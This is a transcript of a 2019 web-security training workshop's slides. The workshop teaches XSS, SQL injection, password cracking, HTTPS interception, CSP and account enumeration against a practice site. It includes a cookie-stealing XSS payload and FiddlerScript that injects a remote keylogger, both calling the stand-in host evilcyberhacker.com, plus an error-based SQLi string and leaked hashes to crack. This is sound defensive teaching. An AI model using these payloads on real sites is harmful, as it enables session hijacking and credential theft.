"Hack Yourself First" Workshop Slide Deck, Feb 2019

Transcript

1. Hack Yourself First Scott Helme @Scott_Helme scotthelme.co.uk [email protected]

2. We’re gonna turn you into lean, mean hacking machines!

3. Because if we don’t, these kids are going to hack

   you Ryan Cleary, 19 (and his mum) Jake Davies, 18 (and his mum)

4. Who are we protecting our assets from? Hacker Competency Hacker

   Resources Bored kids Pocket money Common Thieves Can invest where ROI makes sense Super Hackers $10.8B per annum
5. None

6. Your Hacker Tools • A Wi-Fi connection • A mobile

   device you can configure a proxy on • Google Chrome – Or another browser with good dev tools • Fiddler – getfiddler.com – Or another HTTP proxy like charlesproxy.com

7. What we’ll be covering Introduction – 30 mins 09:00 Discovering

   risks via the browser – 30 mins 09:30 Using an HTTP proxy – 30 mins 10:00 Break – 15 mins 10:30 XSS – 50 mins 10:45 SQL injection part 1 – 55 mins 11:35 Lunch – 1 hour 12:30 Password cracking – 50 mins 13:30 HTTPS – 60 mins 14:20 Break – 15 mins 15:20 Content Security Policy – 55 mins 15:35 Account Enumeration – 30 mins 16:30 Close 17:00

8. Discovering risks via the browser Exercise 1

9. Exercise 1 – Chrome developer tools • Familiarise yourself with

   the dev tools – Elements, network, cookies, console, por… uh, incognito • Create an account at hackyourselffirst.troyhunt.com Hacker Challenge 1: Identify three security risks with the registration process

10. Using an HTTP proxy Exercise 2

11. Exercise 2 – Using an HTTP proxy • Familiarise yourself

    with Fiddler – Watch requests and their headers, review response body and headers, use the composer to reissue request Hacker Challenge 2: Use Fiddler to vote multiple times on 1 car with your ID

12. Reflected cross site scripting (XSS) Exercise 3

13. Understanding XSS mysite.com/?q=<script>alert('Yay XSS!');</script> <p>You searched for <%= Request.QueryString["q"] %></p>

    <p>You searched for <script>alert('Yay XSS!');</script></p> mysite.com/?q=ferrari <p>You searched for ferrari</p>

14. Some quick XSS tips • Check the encoding context –

    You encode for HTML differently than for JavaScript • Check the encoding consistency – Often it’s manual and some characters are not encoded • Play with JavaScript to: – Manipulate the DOM, access cookies, load external resources

15. Exercise 3 – XSS • Establish the encoding practices on

    the search page – What’s encoded, what’s not, what contexts are encoding • What can be accessed or manipulated in the DOM Hacker Challenge 3: Create an XSS attack that sends the auth cookie to another site

16. Exercise 3 solution ');var img=document.createElement("img");img.src="http://evilcyberha cker.com/LogCookies?cookies="%2bdocument.cookie;document.body .appendChild(img);$('h2').text('Nothing interesting to see

    here at all...');//

17. SQL injection (SQLi) part 1 Exercise 4

18. Understanding SQLi mysite.com/?id=foo var query = "SELECT * FROM Widget

    WHERE Id = " query += Request.Query["id"] SELECT * FROM Widget WHERE Id = foo mysite.com/?id=1 SELECT * FROM Widget WHERE Id = 1 Invalid column name 'foo'

19. Some quick SQLi tips • Think of SQL commands which

    disclose structure – sys.tables, sys.columns, system commands • Consider how you’d enumerate through records – Select top x rows asc then top 1 rows from that desc • Write out how you think the query works internally – SELECT * FROM Supercar ORDER BY [URL param]

20. Exercise 4 – SQLi • Explore the database using error-based

    SQLi – Construct strings to disclose internal data – Cast things to invalid types to disclose via exceptions Hacker Challenge 4: Discover the version of the DB

21. Exercise 4 solution http://hack-yourself-first.com/Make/1 ?orderby=@@VERSION*1

22. Over Lunch Download hashcat files.troyhunt.com/hashcat Download the hashkiller dic files.troyhunt.com/hashkiller

    Download the Stratfor hashes files.troyhunt.com/stratforhashes

23. Password cracking Exercise 5

24. Understanding password hashing passw0rd Hashing algorithm Output Store and repeat

    process at login

25. Understanding password hashing with salt passw0rd + random salt Hashing

    algorithm Output Store output and salt Retrieve output and salt for username and repeat process at login

26. Understanding hash cracking • This is not about breaking the

    algorithm – You can’t “unhash” • It’s about repeating the hash-creation process – It’s just a question of speed…

27. Some quick hash cracking tips • There are multiple ways

    to crack – Character space: [a-zA-Z0-9] – Dictionary: passw0rd, abc123, qwerty – Mutations: manipulation and substitution of characters • Cracking is all about time factor – it’s not “absolute” – How long to crack how much

28. Exercise 5 – Password cracking • Cracking the Stratfor password

    hashes – Identify the hashing algorithm – Convert them to plain text Hacker Challenge 5: Use hashcat with the hashkiller dic to crack the Strafor hashes Hint: hashcat64.exe --help

29. HTTPS Exercise 6

30. Understanding HTTPS Confidentiality Integrity Authenticity

31. Some quick HTTPS tips • Consider everything sent over HTTP

    to be compromised • Also look at HTTPS content embedded in untrusted pages – Iframes – Links to HTTPS

32. Exercise 6 – HTTPS • You can’t trust insecure login

    forms! – The form can be manipulated in transit – Manipulate it to capture the “secure” credentials in transit Hacker Challenge 6: Inject a JavaScript keylogger into an insecure login page using Fiddler script

33. The keylogger http://evilcyberhacker.com/keylogger.js Set the “destination” JavaScript variable

34. Injecting the keylogger if (oSession.HostnameIs("hackyourselffirst.troyhunt.com") && oSession.oResponse.headers.ExistsAndContains("Content- Type","text/html")){ oSession.utilDecodeResponse(); oSession.utilReplaceInResponse('</head>','<script

    src="http://evilcyberhacker.com/keylogger.js"></script><scr ipt>destination="http://evilcyberhacker.com/LogKeyPress?";< /script></head>'); }

35. Content Security Policy (CSP) Exercise 7

36. Without a CSP • Anything can be added to the

    page via a reflected XSS risk • Anything can be added to the DOM downstream of the server – …and you have no idea when this one is happening!

37. With a CSP • The browser will only load resources

    you white-list – Local resources – Remote resources • Any violations can be reported – If you’re nervous, you always just report and not block

38. Some quick CSP tips • Create a white list of

    what should be allowed to run • Start with nothing and see what breaks – In development! • Use the report feature to track exceptions – You’ll learn some interesting things…

39. Exercise 7 – CSP • Your company’s website needs help!

    – They have no CSP – We can add one ourselves in transit Hacker Challenge 7: Write a CSP for your website and embed it using FiddlerScript

40. Injecting the CSP header if (oSession.HostnameIs("example.com")) { oSession.oResponse.headers["Content-Security-Policy"] = "default-src

    'self'"; }

41. Account enumeration Exercise 8

42. Understanding account enumeration Does [email protected] have an account? No Does

    [email protected] have an account? No Does [email protected] have an account? Yes

43. Some quick account enumeration tips • There are usually multiple

    vectors for identifying the existence of an account • There may or may not be anti-automation defence – And it may be inconsistent across vectors • It may or may not even matter… – Very dependent on the nature of the site

44. Exercise 8 – Account enumeration • Identify vectors for account

    enumeration – Think about how to “ask” the site about an account – Identify positive versus negative responses Hacker Challenge 8: Identify 3 sites you use that disclose the presence of your account